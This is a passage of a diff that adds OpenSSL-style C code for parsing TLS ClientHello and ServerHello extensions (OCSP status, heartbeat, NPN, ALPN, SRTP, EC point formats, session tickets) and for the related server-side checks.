+                        *al = SSL_AD_DECODE_ERROR;
+                        return 0;
+                    }
+                    if (data != sdata) {
+                        OCSP_RESPID_free(id);
+                        *al = SSL_AD_DECODE_ERROR;
+                        return 0;
+                    }
+                    if (!s->tlsext_ocsp_ids
+                        && !(s->tlsext_ocsp_ids =
+                             sk_OCSP_RESPID_new_null())) {
+                        OCSP_RESPID_free(id);
+                        *al = SSL_AD_INTERNAL_ERROR;
+                        return 0;
+                    }
+                    if (!sk_OCSP_RESPID_push(s->tlsext_ocsp_ids, id)) {
+                        OCSP_RESPID_free(id);
+                        *al = SSL_AD_INTERNAL_ERROR;
+                        return 0;
+                    }
+                }
+
+                /* Read in request_extensions */
+                if (size < 2) {
+                    *al = SSL_AD_DECODE_ERROR;
+                    return 0;
+                }
+                n2s(data, dsize);
+                size -= 2;
+                if (dsize != size) {
+                    *al = SSL_AD_DECODE_ERROR;
+                    return 0;
+                }
+                sdata = data;
+                if (dsize > 0) {
+                    if (s->tlsext_ocsp_exts) {
+                        sk_X509_EXTENSION_pop_free(s->tlsext_ocsp_exts,
+                                                   X509_EXTENSION_free);
+                    }
+
+                    s->tlsext_ocsp_exts =
+                        d2i_X509_EXTENSIONS(NULL, &sdata, dsize);
+                    if (!s->tlsext_ocsp_exts || (data + dsize != sdata)) {
+                        *al = SSL_AD_DECODE_ERROR;
+                        return 0;
+                    }
+                }
+            }
+            /*
+             * We don't know what to do with any other type * so ignore it.
+             */
+            else
+                s->tlsext_status_type = -1;
+        }
+# ifndef OPENSSL_NO_HEARTBEATS
+        else if (type == TLSEXT_TYPE_heartbeat) {
+            switch (data[0]) {
+            case 0x01:         /* Client allows us to send HB requests */
+                s->tlsext_heartbeat |= SSL_TLSEXT_HB_ENABLED;
+                break;
+            case 0x02:         /* Client doesn't accept HB requests */
+                s->tlsext_heartbeat |= SSL_TLSEXT_HB_ENABLED;
+                s->tlsext_heartbeat |= SSL_TLSEXT_HB_DONT_SEND_REQUESTS;
+                break;
+            default:
+                *al = SSL_AD_ILLEGAL_PARAMETER;
+                return 0;
+            }
+        }
+# endif
+# ifndef OPENSSL_NO_NEXTPROTONEG
+        else if (type == TLSEXT_TYPE_next_proto_neg &&
+                 s->s3->tmp.finish_md_len == 0 &&
+                 s->s3->alpn_selected == NULL) {
+            /*-
+             * We shouldn't accept this extension on a
+             * renegotiation.
+             *
+             * s->new_session will be set on renegotiation, but we
+             * probably shouldn't rely that it couldn't be set on
+             * the initial renegotation too in certain cases (when
+             * there's some other reason to disallow resuming an
+             * earlier session -- the current code won't be doing
+             * anything like that, but this might change).
+             *
+             * A valid sign that there's been a previous handshake
+             * in this connection is if s->s3->tmp.finish_md_len >
+             * 0.  (We are talking about a check that will happen
+             * in the Hello protocol round, well before a new
+             * Finished message could have been computed.)
+             */
+            s->s3->next_proto_neg_seen = 1;
+        }
+# endif
+
+        else if (type == TLSEXT_TYPE_application_layer_protocol_negotiation &&
+                 s->ctx->alpn_select_cb && s->s3->tmp.finish_md_len == 0) {
+            if (tls1_alpn_handle_client_hello(s, data, size, al) != 0)
+                return 0;
+# ifndef OPENSSL_NO_NEXTPROTONEG
+            /* ALPN takes precedence over NPN. */
+            s->s3->next_proto_neg_seen = 0;
+# endif
+        }
+
+        /* session ticket processed earlier */
+# ifndef OPENSSL_NO_SRTP
+        else if (SSL_IS_DTLS(s) && SSL_get_srtp_profiles(s)
+                 && type == TLSEXT_TYPE_use_srtp) {
+            if (ssl_parse_clienthello_use_srtp_ext(s, data, size, al))
+                return 0;
+        }
+# endif
+
+        data += size;
+    }
+
+    *p = data;
+
+ ri_check:
+
+    /* Need RI if renegotiating */
+
+    if (!renegotiate_seen && s->renegotiate &&
+        !(s->options & SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION)) {
+        *al = SSL_AD_HANDSHAKE_FAILURE;
+        SSLerr(SSL_F_SSL_SCAN_CLIENTHELLO_TLSEXT,
+               SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED);
+        return 0;
+    }
+
+    return 1;
+}
+
+/*
+ * Parse any custom extensions found.  "data" is the start of the extension data
+ * and "limit" is the end of the record. TODO: add strict syntax checking.
+ */
+
+static int ssl_scan_clienthello_custom_tlsext(SSL *s,
+                                              const unsigned char *data,
+                                              const unsigned char *limit,
+                                              int *al)
+{
+    unsigned short type, size, len;
+    /* If resumed session or no custom extensions nothing to do */
+    if (s->hit || s->cert->srv_ext.meths_count == 0)
+        return 1;
+
+    if (data >= limit - 2)
+        return 1;
+    n2s(data, len);
+
+    if (data > limit - len)
+        return 1;
+
+    while (data <= limit - 4) {
+        n2s(data, type);
+        n2s(data, size);
+
+        if (data + size > limit)
+            return 1;
+        if (custom_ext_parse(s, 1 /* server */ , type, data, size, al) <= 0)
+            return 0;
+
+        data += size;
+    }
+
+    return 1;
+}
+
+int ssl_parse_clienthello_tlsext(SSL *s, unsigned char **p, unsigned char *d,
+                                 int n)
+{
+    int al = -1;
+    unsigned char *ptmp = *p;
+    /*
+     * Internally supported extensions are parsed first so SNI can be handled
+     * before custom extensions. An application processing SNI will typically
+     * switch the parent context using SSL_set_SSL_CTX and custom extensions
+     * need to be handled by the new SSL_CTX structure.
+     */
+    if (ssl_scan_clienthello_tlsext(s, p, d, n, &al) <= 0) {
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+        return 0;
+    }
+
+    if (ssl_check_clienthello_tlsext_early(s) <= 0) {
+        SSLerr(SSL_F_SSL_PARSE_CLIENTHELLO_TLSEXT, SSL_R_CLIENTHELLO_TLSEXT);
+        return 0;
+    }
+
+    custom_ext_init(&s->cert->srv_ext);
+    if (ssl_scan_clienthello_custom_tlsext(s, ptmp, d + n, &al) <= 0) {
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+        return 0;
+    }
+
+    return 1;
+}
+
+# ifndef OPENSSL_NO_NEXTPROTONEG
+/*
+ * ssl_next_proto_validate validates a Next Protocol Negotiation block. No
+ * elements of zero length are allowed and the set of elements must exactly
+ * fill the length of the block.
+ */
+static char ssl_next_proto_validate(unsigned char *d, unsigned len)
+{
+    unsigned int off = 0;
+
+    while (off < len) {
+        if (d[off] == 0)
+            return 0;
+        off += d[off];
+        off++;
+    }
+
+    return off == len;
+}
+# endif
+
+static int ssl_scan_serverhello_tlsext(SSL *s, unsigned char **p,
+                                       unsigned char *d, int n, int *al)
+{
+    unsigned short length;
+    unsigned short type;
+    unsigned short size;
+    unsigned char *data = *p;
+    int tlsext_servername = 0;
+    int renegotiate_seen = 0;
+
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    s->s3->next_proto_neg_seen = 0;
+# endif
+    s->tlsext_ticket_expected = 0;
+
+    if (s->s3->alpn_selected) {
+        OPENSSL_free(s->s3->alpn_selected);
+        s->s3->alpn_selected = NULL;
+    }
+# ifndef OPENSSL_NO_HEARTBEATS
+    s->tlsext_heartbeat &= ~(SSL_TLSEXT_HB_ENABLED |
+                             SSL_TLSEXT_HB_DONT_SEND_REQUESTS);
+# endif
+
+    if (data >= (d + n - 2))
+        goto ri_check;
+
+    n2s(data, length);
+    if (data + length != d + n) {
+        *al = SSL_AD_DECODE_ERROR;
+        return 0;
+    }
+
+    while (data <= (d + n - 4)) {
+        n2s(data, type);
+        n2s(data, size);
+
+        if (data + size > (d + n))
+            goto ri_check;
+
+        if (s->tlsext_debug_cb)
+            s->tlsext_debug_cb(s, 1, type, data, size, s->tlsext_debug_arg);
+
+        if (type == TLSEXT_TYPE_server_name) {
+            if (s->tlsext_hostname == NULL || size > 0) {
+                *al = TLS1_AD_UNRECOGNIZED_NAME;
+                return 0;
+            }
+            tlsext_servername = 1;
+        }
+# ifndef OPENSSL_NO_EC
+        else if (type == TLSEXT_TYPE_ec_point_formats) {
+            unsigned char *sdata = data;
+            int ecpointformatlist_length = *(sdata++);
+
+            if (ecpointformatlist_length != size - 1) {
+                *al = TLS1_AD_DECODE_ERROR;
+                return 0;
+            }
+            if (!s->hit) {
+                s->session->tlsext_ecpointformatlist_length = 0;
+                if (s->session->tlsext_ecpointformatlist != NULL)
+                    OPENSSL_free(s->session->tlsext_ecpointformatlist);
+                if ((s->session->tlsext_ecpointformatlist =
+                     OPENSSL_malloc(ecpointformatlist_length)) == NULL) {
+                    *al = TLS1_AD_INTERNAL_ERROR;
+                    return 0;
+                }
+                s->session->tlsext_ecpointformatlist_length =
+                    ecpointformatlist_length;
+                memcpy(s->session->tlsext_ecpointformatlist, sdata,
+                       ecpointformatlist_length);
+            }
+#  if 0
+            fprintf(stderr,
+                    "ssl_parse_serverhello_tlsext s->session->tlsext_ecpointformatlist ");
+            sdata = s->session->tlsext_ecpointformatlist;
+            for (i = 0; i < s->session->tlsext_ecpointformatlist_length; i++)
+                fprintf(stderr, "%i ", *(sdata++));
+            fprintf(stderr, "\n");
+#  endif
+        }
+# endif                         /* OPENSSL_NO_EC */
+
+        else if (type == TLSEXT_TYPE_session_ticket) {
+            if (s->tls_session_ticket_ext_cb &&
+                !s->tls_session_ticket_ext_cb(s, data, size,
+                                              s->tls_session_ticket_ext_cb_arg))
+            {
+                *al = TLS1_AD_INTERNAL_ERROR;
+                return 0;
+            }
+            if ((SSL_get_options(s) & SSL_OP_NO_TICKET)
+                || (size > 0)) {
+                *al = TLS1_AD_UNSUPPORTED_EXTENSION;
+                return 0;
+            }
+            s->tlsext_ticket_expected = 1;
+        }
+# ifdef TLSEXT_TYPE_opaque_prf_input
+        else if (type == TLSEXT_TYPE_opaque_prf_input) {
+            unsigned char *sdata = data;
+
+            if (size < 2) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+            n2s(sdata, s->s3->server_opaque_prf_input_len);
+            if (s->s3->server_opaque_prf_input_len != size - 2) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+
+            if (s->s3->server_opaque_prf_input != NULL) {
+                /* shouldn't really happen */
+                OPENSSL_free(s->s3->server_opaque_prf_input);
+            }
+            if (s->s3->server_opaque_prf_input_len == 0) {
+                /* dummy byte just to get non-NULL */
+                s->s3->server_opaque_prf_input = OPENSSL_malloc(1);
+            } else {
+                s->s3->server_opaque_prf_input =
+                    BUF_memdup(sdata, s->s3->server_opaque_prf_input_len);
+            }
+
+            if (s->s3->server_opaque_prf_input == NULL) {
+                *al = TLS1_AD_INTERNAL_ERROR;
+                return 0;
+            }
+        }
+# endif
+        else if (type == TLSEXT_TYPE_status_request) {
+            /*
+             * MUST be empty and only sent if we've requested a status
+             * request message.
+             */
+            if ((s->tlsext_status_type == -1) || (size > 0)) {
+                *al = TLS1_AD_UNSUPPORTED_EXTENSION;
+                return 0;
+            }
+            /* Set flag to expect CertificateStatus message */
+            s->tlsext_status_expected = 1;
+        }
+# ifndef OPENSSL_NO_NEXTPROTONEG
+        else if (type == TLSEXT_TYPE_next_proto_neg &&
+                 s->s3->tmp.finish_md_len == 0) {
+            unsigned char *selected;
+            unsigned char selected_len;
+
+            /* We must have requested it. */
+            if (s->ctx->next_proto_select_cb == NULL) {
+                *al = TLS1_AD_UNSUPPORTED_EXTENSION;
+                return 0;
+            }
+            /* The data must be valid */
+            if (!ssl_next_proto_validate(data, size)) {
+                *al = TLS1_AD_DECODE_ERROR;
+                return 0;
+            }
+            if (s->
+                ctx->next_proto_select_cb(s, &selected, &selected_len, data,
+                                          size,
+                                          s->ctx->next_proto_select_cb_arg) !=
+                SSL_TLSEXT_ERR_OK) {
+                *al = TLS1_AD_INTERNAL_ERROR;
+                return 0;
+            }
+            s->next_proto_negotiated = OPENSSL_malloc(selected_len);
+            if (!s->next_proto_negotiated) {
+                *al = TLS1_AD_INTERNAL_ERROR;
+                return 0;
+            }
+            memcpy(s->next_proto_negotiated, selected, selected_len);
+            s->next_proto_negotiated_len = selected_len;
+            s->s3->next_proto_neg_seen = 1;
+        }
+# endif
+
+        else if (type == TLSEXT_TYPE_application_layer_protocol_negotiation) {
+            unsigned len;
+
+            /* We must have requested it. */
+            if (s->alpn_client_proto_list == NULL) {
+                *al = TLS1_AD_UNSUPPORTED_EXTENSION;
+                return 0;
+            }
+            if (size < 4) {
+                *al = TLS1_AD_DECODE_ERROR;
+                return 0;
+            }
+            /*-
+             * The extension data consists of:
+             *   uint16 list_length
+             *   uint8 proto_length;
+             *   uint8 proto[proto_length];
+             */
+            len = data[0];
+            len <<= 8;
+            len |= data[1];
+            if (len != (unsigned)size - 2) {
+                *al = TLS1_AD_DECODE_ERROR;
+                return 0;
+            }
+            len = data[2];
+            if (len != (unsigned)size - 3) {
+                *al = TLS1_AD_DECODE_ERROR;
+                return 0;
+            }
+            if (s->s3->alpn_selected)
+                OPENSSL_free(s->s3->alpn_selected);
+            s->s3->alpn_selected = OPENSSL_malloc(len);
+            if (!s->s3->alpn_selected) {
+                *al = TLS1_AD_INTERNAL_ERROR;
+                return 0;
+            }
+            memcpy(s->s3->alpn_selected, data + 3, len);
+            s->s3->alpn_selected_len = len;
+        }
+
+        else if (type == TLSEXT_TYPE_renegotiate) {
+            if (!ssl_parse_serverhello_renegotiate_ext(s, data, size, al))
+                return 0;
+            renegotiate_seen = 1;
+        }
+# ifndef OPENSSL_NO_HEARTBEATS
+        else if (type == TLSEXT_TYPE_heartbeat) {
+            switch (data[0]) {
+            case 0x01:         /* Server allows us to send HB requests */
+                s->tlsext_heartbeat |= SSL_TLSEXT_HB_ENABLED;
+                break;
+            case 0x02:         /* Server doesn't accept HB requests */
+                s->tlsext_heartbeat |= SSL_TLSEXT_HB_ENABLED;
+                s->tlsext_heartbeat |= SSL_TLSEXT_HB_DONT_SEND_REQUESTS;
+                break;
+            default:
+                *al = SSL_AD_ILLEGAL_PARAMETER;
+                return 0;
+            }
+        }
+# endif
+# ifndef OPENSSL_NO_SRTP
+        else if (SSL_IS_DTLS(s) && type == TLSEXT_TYPE_use_srtp) {
+            if (ssl_parse_serverhello_use_srtp_ext(s, data, size, al))
+                return 0;
+        }
+# endif
+        /*
+         * If this extension type was not otherwise handled, but matches a
+         * custom_cli_ext_record, then send it to the c callback
+         */
+        else if (custom_ext_parse(s, 0, type, data, size, al) <= 0)
+            return 0;
+
+        data += size;
+    }
+
+    if (data != d + n) {
+        *al = SSL_AD_DECODE_ERROR;
+        return 0;
+    }
+
+    if (!s->hit && tlsext_servername == 1) {
+        if (s->tlsext_hostname) {
+            if (s->session->tlsext_hostname == NULL) {
+                s->session->tlsext_hostname = BUF_strdup(s->tlsext_hostname);
+                if (!s->session->tlsext_hostname) {
+                    *al = SSL_AD_UNRECOGNIZED_NAME;
+                    return 0;
+                }
+            } else {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+        }
+    }
+
+    *p = data;
+
+ ri_check:
+
+    /*
+     * Determine if we need to see RI. Strictly speaking if we want to avoid
+     * an attack we should *always* see RI even on initial server hello
+     * because the client doesn't see any renegotiation during an attack.
+     * However this would mean we could not connect to any server which
+     * doesn't support RI so for the immediate future tolerate RI absence on
+     * initial connect only.
+     */
+    if (!renegotiate_seen && !(s->options & SSL_OP_LEGACY_SERVER_CONNECT)
+        && !(s->options & SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION)) {
+        *al = SSL_AD_HANDSHAKE_FAILURE;
+        SSLerr(SSL_F_SSL_SCAN_SERVERHELLO_TLSEXT,
+               SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED);
+        return 0;
+    }
+
+    return 1;
+}
+
+int ssl_prepare_clienthello_tlsext(SSL *s)
+{
+
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    {
+        int r = 1;
+
+        if (s->ctx->tlsext_opaque_prf_input_callback != 0) {
+            r = s->ctx->tlsext_opaque_prf_input_callback(s, NULL, 0,
+                                                         s->
+                                                         ctx->tlsext_opaque_prf_input_callback_arg);
+            if (!r)
+                return -1;
+        }
+
+        if (s->tlsext_opaque_prf_input != NULL) {
+            if (s->s3->client_opaque_prf_input != NULL) {
+                /* shouldn't really happen */
+                OPENSSL_free(s->s3->client_opaque_prf_input);
+            }
+
+            if (s->tlsext_opaque_prf_input_len == 0) {
+                /* dummy byte just to get non-NULL */
+                s->s3->client_opaque_prf_input = OPENSSL_malloc(1);
+            } else {
+                s->s3->client_opaque_prf_input =
+                    BUF_memdup(s->tlsext_opaque_prf_input,
+                               s->tlsext_opaque_prf_input_len);
+            }
+            if (s->s3->client_opaque_prf_input == NULL) {
+                SSLerr(SSL_F_SSL_PREPARE_CLIENTHELLO_TLSEXT,
+                       ERR_R_MALLOC_FAILURE);
+                return -1;
+            }
+            s->s3->client_opaque_prf_input_len =
+                s->tlsext_opaque_prf_input_len;
+        }
+
+        if (r == 2)
+            /*
+             * at callback's request, insist on receiving an appropriate
+             * server opaque PRF input
+             */
+            s->s3->server_opaque_prf_input_len =
+                s->tlsext_opaque_prf_input_len;
+    }
+# endif
+
+    return 1;
+}
+
+int ssl_prepare_serverhello_tlsext(SSL *s)
+{
+    return 1;
+}
+
+static int ssl_check_clienthello_tlsext_early(SSL *s)
+{
+    int ret = SSL_TLSEXT_ERR_NOACK;
+    int al = SSL_AD_UNRECOGNIZED_NAME;
+
+# ifndef OPENSSL_NO_EC
+    /*
+     * The handling of the ECPointFormats extension is done elsewhere, namely
+     * in ssl3_choose_cipher in s3_lib.c.
+     */
+    /*
+     * The handling of the EllipticCurves extension is done elsewhere, namely
+     * in ssl3_choose_cipher in s3_lib.c.
+     */
+# endif
+
+    if (s->ctx != NULL && s->ctx->tlsext_servername_callback != 0)
+        ret =
+            s->ctx->tlsext_servername_callback(s, &al,
+                                               s->ctx->tlsext_servername_arg);
+    else if (s->initial_ctx != NULL
+             && s->initial_ctx->tlsext_servername_callback != 0)
+        ret =
+            s->initial_ctx->tlsext_servername_callback(s, &al,
+                                                       s->
+                                                       initial_ctx->tlsext_servername_arg);
+
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    {
+        /*
+         * This sort of belongs into ssl_prepare_serverhello_tlsext(), but we
+         * might be sending an alert in response to the client hello, so this
+         * has to happen here in ssl_check_clienthello_tlsext_early().
+         */
+
+        int r = 1;
+
+        if (s->ctx->tlsext_opaque_prf_input_callback != 0) {
+            r = s->ctx->tlsext_opaque_prf_input_callback(s, NULL, 0,
+                                                         s->
+                                                         ctx->tlsext_opaque_prf_input_callback_arg);
+            if (!r) {
+                ret = SSL_TLSEXT_ERR_ALERT_FATAL;
+                al = SSL_AD_INTERNAL_ERROR;
+                goto err;
+            }
+        }
+
+        if (s->s3->server_opaque_prf_input != NULL) {
+            /* shouldn't really happen */
+            OPENSSL_free(s->s3->server_opaque_prf_input);
+        }
+        s->s3->server_opaque_prf_input = NULL;
+
+        if (s->tlsext_opaque_prf_input != NULL) {
+            if (s->s3->client_opaque_prf_input != NULL &&
+                s->s3->client_opaque_prf_input_len ==
+                s->tlsext_opaque_prf_input_len) {
+                /*
+                 * can only use this extension if we have a server opaque PRF
+                 * input of the same length as the client opaque PRF input!
+                 */
+
+                if (s->tlsext_opaque_prf_input_len == 0) {
+                    /* dummy byte just to get non-NULL */
+                    s->s3->server_opaque_prf_input = OPENSSL_malloc(1);
+                } else {
+                    s->s3->server_opaque_prf_input =
+                        BUF_memdup(s->tlsext_opaque_prf_input,
+                                   s->tlsext_opaque_prf_input_len);
+                }
+                if (s->s3->server_opaque_prf_input == NULL) {
+                    ret = SSL_TLSEXT_ERR_ALERT_FATAL;
+                    al = SSL_AD_INTERNAL_ERROR;
+                    goto err;
+                }
+                s->s3->server_opaque_prf_input_len =
+                    s->tlsext_opaque_prf_input_len;
+            }
+        }
+
+        if (r == 2 && s->s3->server_opaque_prf_input == NULL) {
+            /*
+             * The callback wants to enforce use of the extension, but we
+             * can't do that with the client opaque PRF input; abort the
+             * handshake.
+             */
+            ret = SSL_TLSEXT_ERR_ALERT_FATAL;
+            al = SSL_AD_HANDSHAKE_FAILURE;
+        }
+    }
+
+ err:
+# endif
+    switch (ret) {
+    case SSL_TLSEXT_ERR_ALERT_FATAL:
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+        return -1;
+
+    case SSL_TLSEXT_ERR_ALERT_WARNING:
+        ssl3_send_alert(s, SSL3_AL_WARNING, al);
+        return 1;
+
+    case SSL_TLSEXT_ERR_NOACK:
+        s->servername_done = 0;
+    default:
+        return 1;
+    }
+}
+
+int tls1_set_server_sigalgs(SSL *s)
+{
+    int al;
+    size_t i;
+    /* Clear any shared sigtnature algorithms */
+    if (s->cert->shared_sigalgs) {
+        OPENSSL_free(s->cert->shared_sigalgs);
+        s->cert->shared_sigalgs = NULL;
+    }
+    /* Clear certificate digests and validity flags */
+    for (i = 0; i < SSL_PKEY_NUM; i++) {
+        s->cert->pkeys[i].digest = NULL;
+        s->cert->pkeys[i].valid_flags = 0;
+    }
+
+    /* If sigalgs received process it. */
+    if (s->cert->peer_sigalgs) {
+        if (!tls1_process_sigalgs(s)) {
+            SSLerr(SSL_F_TLS1_SET_SERVER_SIGALGS, ERR_R_MALLOC_FAILURE);
+            al = SSL_AD_INTERNAL_ERROR;
+            goto err;
+        }
+        /* Fatal error is no shared signature algorithms */
+        if (!s->cert->shared_sigalgs) {
+            SSLerr(SSL_F_TLS1_SET_SERVER_SIGALGS,
+                   SSL_R_NO_SHARED_SIGATURE_ALGORITHMS);
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            goto err;
+        }
+    } else
+        ssl_cert_set_default_md(s->cert);
+    return 1;
+ err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+    return 0;
+}
+
+int ssl_check_clienthello_tlsext_late(SSL *s)
+{
+    int ret = SSL_TLSEXT_ERR_OK;
+    int al;
+
+    /*
+     * If status request then ask callback what to do. Note: this must be
+     * called after servername callbacks in case the certificate has changed,
+     * and must be called after the cipher has been chosen because this may
+     * influence which certificate is sent
+     */
+    if ((s->tlsext_status_type != -1) && s->ctx && s->ctx->tlsext_status_cb) {
+        int r;
+        CERT_PKEY *certpkey;
+        certpkey = ssl_get_server_send_pkey(s);
+        /* If no certificate can't return certificate status */
+        if (certpkey == NULL) {
+            s->tlsext_status_expected = 0;
+            return 1;
+        }
+        /*
+         * Set current certificate to one we will use so SSL_get_certificate
+         * et al can pick it up.
+         */
+        s->cert->key = certpkey;
+        r = s->ctx->tlsext_status_cb(s, s->ctx->tlsext_status_arg);
+        switch (r) {
+            /* We don't want to send a status request response */
+        case SSL_TLSEXT_ERR_NOACK:
+            s->tlsext_status_expected = 0;
+            break;
+            /* status request response should be sent */
+        case SSL_TLSEXT_ERR_OK:
+            if (s->tlsext_ocsp_resp)
+                s->tlsext_status_expected = 1;
+            else
+                s->tlsext_status_expected = 0;
+            break;
+            /* something bad happened */
+        case SSL_TLSEXT_ERR_ALERT_FATAL:
+            ret = SSL_TLSEXT_ERR_ALERT_FATAL;
+            al = SSL_AD_INTERNAL_ERROR;
+            goto err;
+        }
+    } else
+        s->tlsext_status_expected = 0;
+
+ err:
+    switch (ret) {
+    case SSL_TLSEXT_ERR_ALERT_FATAL:
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+        return -1;
+
+    case SSL_TLSEXT_ERR_ALERT_WARNING:
+        ssl3_send_alert(s, SSL3_AL_WARNING, al);
+        return 1;
+
+    default:
+        return 1;
+    }
+}
+
+int ssl_check_serverhello_tlsext(SSL *s)
+{
+    int ret = SSL_TLSEXT_ERR_NOACK;
+    int al = SSL_AD_UNRECOGNIZED_NAME;
+
+# ifndef OPENSSL_NO_EC
+    /*
+     * If we are client and using an elliptic curve cryptography cipher
+     * suite, then if server returns an EC point formats lists extension it
+     * must contain uncompressed.
+     */
+    unsigned long alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
+    unsigned long alg_a = s->s3->tmp.new_cipher->algorithm_auth;
+    if ((s->tlsext_ecpointformatlist != NULL)
+        && (s->tlsext_ecpointformatlist_length > 0)
+        && (s->session->tlsext_ecpointformatlist != NULL)
+        && (s->session->tlsext_ecpointformatlist_length > 0)
+        && ((alg_k & (SSL_kEECDH | SSL_kECDHr | SSL_kECDHe))
+            || (alg_a & SSL_aECDSA))) {
+        /* we are using an ECC cipher */
+        size_t i;
+        unsigned char *list;
+        int found_uncompressed = 0;
+        list = s->session->tlsext_ecpointformatlist;
+        for (i = 0; i < s->session->tlsext_ecpointformatlist_length; i++) {
+            if (*(list++) == TLSEXT_ECPOINTFORMAT_uncompressed) {
+                found_uncompressed = 1;
+                break;
+            }
+        }
+        if (!found_uncompressed) {
+            SSLerr(SSL_F_SSL_CHECK_SERVERHELLO_TLSEXT,
+                   SSL_R_TLS_INVALID_ECPOINTFORMAT_LIST);
+            return -1;
+        }
+    }
+    ret = SSL_TLSEXT_ERR_OK;
+# endif                         /* OPENSSL_NO_EC */
+
+    if (s->ctx != NULL && s->ctx->tlsext_servername_callback != 0)
+        ret =
+            s->ctx->tlsext_servername_callback(s, &al,
+                                               s->ctx->tlsext_servername_arg);
+    else if (s->initial_ctx != NULL
+             && s->initial_ctx->tlsext_servername_callback != 0)
+        ret =
+            s->initial_ctx->tlsext_servername_callback(s, &al,
+                                                       s->
+                                                       initial_ctx->tlsext_servername_arg);
+
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    if (s->s3->server_opaque_prf_input_len > 0) {
+        /*
+         * This case may indicate that we, as a client, want to insist on
+         * using opaque PRF inputs. So first verify that we really have a
+         * value from the server too.
+         */
+
+        if (s->s3->server_opaque_prf_input == NULL) {
+            ret = SSL_TLSEXT_ERR_ALERT_FATAL;
+            al = SSL_AD_HANDSHAKE_FAILURE;
+        }
+
+        /*
+         * Anytime the server *has* sent an opaque PRF input, we need to
+         * check that we have a client opaque PRF input of the same size.
+         */
+        if (s->s3->client_opaque_prf_input == NULL ||
+            s->s3->client_opaque_prf_input_len !=
+            s->s3->server_opaque_prf_input_len) {
+            ret = SSL_TLSEXT_ERR_ALERT_FATAL;
+            al = SSL_AD_ILLEGAL_PARAMETER;
+        }
+    }
+# endif
+
+    /*
+     * If we've requested certificate status and we wont get one tell the
+     * callback
+     */
+    if ((s->tlsext_status_type != -1) && !(s->tlsext_status_expected)
+        && s->ctx && s->ctx->tlsext_status_cb) {
+        int r;
+        /*
+         * Set resp to NULL, resplen to -1 so callback knows there is no
+         * response.
+         */
+        if (s->tlsext_ocsp_resp) {
+            OPENSSL_free(s->tlsext_ocsp_resp);
+            s->tlsext_ocsp_resp = NULL;
+        }
+        s->tlsext_ocsp_resplen = -1;
+        r = s->ctx->tlsext_status_cb(s, s->ctx->tlsext_status_arg);
+        if (r == 0) {
+            al = SSL_AD_BAD_CERTIFICATE_STATUS_RESPONSE;
+            ret = SSL_TLSEXT_ERR_ALERT_FATAL;
+        }
+        if (r < 0) {
+            al = SSL_AD_INTERNAL_ERROR;
+            ret = SSL_TLSEXT_ERR_ALERT_FATAL;
+        }
+    }
+
+    switch (ret) {
+    case SSL_TLSEXT_ERR_ALERT_FATAL:
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+        return -1;
+
+    case SSL_TLSEXT_ERR_ALERT_WARNING:
+        ssl3_send_alert(s, SSL3_AL_WARNING, al);
+        return 1;
+
+    case SSL_TLSEXT_ERR_NOACK:
+        s->servername_done = 0;
+    default:
+        return 1;
+    }
+}
+
+int ssl_parse_serverhello_tlsext(SSL *s, unsigned char **p, unsigned char *d,
+                                 int n)
+{
+    int al = -1;
+    if (s->version < SSL3_VERSION)
+        return 1;
+    if (ssl_scan_serverhello_tlsext(s, p, d, n, &al) <= 0) {
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+        return 0;
+    }
+
+    if (ssl_check_serverhello_tlsext(s) <= 0) {
+        SSLerr(SSL_F_SSL_PARSE_SERVERHELLO_TLSEXT, SSL_R_SERVERHELLO_TLSEXT);
+        return 0;
+    }
+    return 1;
+}
+
+/*-
+ * Since the server cache lookup is done early on in the processing of the
+ * ClientHello, and other operations depend on the result, we need to handle
+ * any TLS session ticket extension at the same time.
+ *
+ *   session_id: points at the session ID in the ClientHello. This code will
+ *       read past the end of this in order to parse out the session ticket
+ *       extension, if any.
+ *   len: the length of the session ID.
+ *   limit: a pointer to the first byte after the ClientHello.
+ *   ret: (output) on return, if a ticket was decrypted, then this is set to
+ *       point to the resulting session.
+ *
+ * If s->tls_session_secret_cb is set then we are expecting a pre-shared key
+ * ciphersuite, in which case we have no use for session tickets and one will
+ * never be decrypted, nor will s->tlsext_ticket_expected be set to 1.
+ *
+ * Returns:
+ *   -1: fatal error, either from parsing or decrypting the ticket.
+ *    0: no ticket was found (or was ignored, based on settings).
+ *    1: a zero length extension was found, indicating that the client supports
+ *       session tickets but doesn't currently have one to offer.
+ *    2: either s->tls_session_secret_cb was set, or a ticket was offered but
+ *       couldn't be decrypted because of a non-fatal error.
+ *    3: a ticket was successfully decrypted and *ret was set.
+ *
+ * Side effects:
+ *   Sets s->tlsext_ticket_expected to 1 if the server will have to issue
+ *   a new session ticket to the client because the client indicated support
+ *   (and s->tls_session_secret_cb is NULL) but the client either doesn't have
+ *   a session ticket or we couldn't use the one it gave us, or if
+ *   s->ctx->tlsext_ticket_key_cb asked to renew the client's ticket.
+ *   Otherwise, s->tlsext_ticket_expected is set to 0.
+ */
+int tls1_process_ticket(SSL *s, unsigned char *session_id, int len,
+                        const unsigned char *limit, SSL_SESSION **ret)
+{
+    /* Point after session ID in client hello */
+    const unsigned char *p = session_id + len;
+    unsigned short i;
+
+    *ret = NULL;
+    s->tlsext_ticket_expected = 0;
+
+    /*
+     * If tickets disabled behave as if no ticket present to permit stateful
+     * resumption.
+     */
+    if (SSL_get_options(s) & SSL_OP_NO_TICKET)
+        return 0;
+    if ((s->version <= SSL3_VERSION) || !limit)
+        return 0;
+    if (p >= limit)
+        return -1;
+    /* Skip past DTLS cookie */
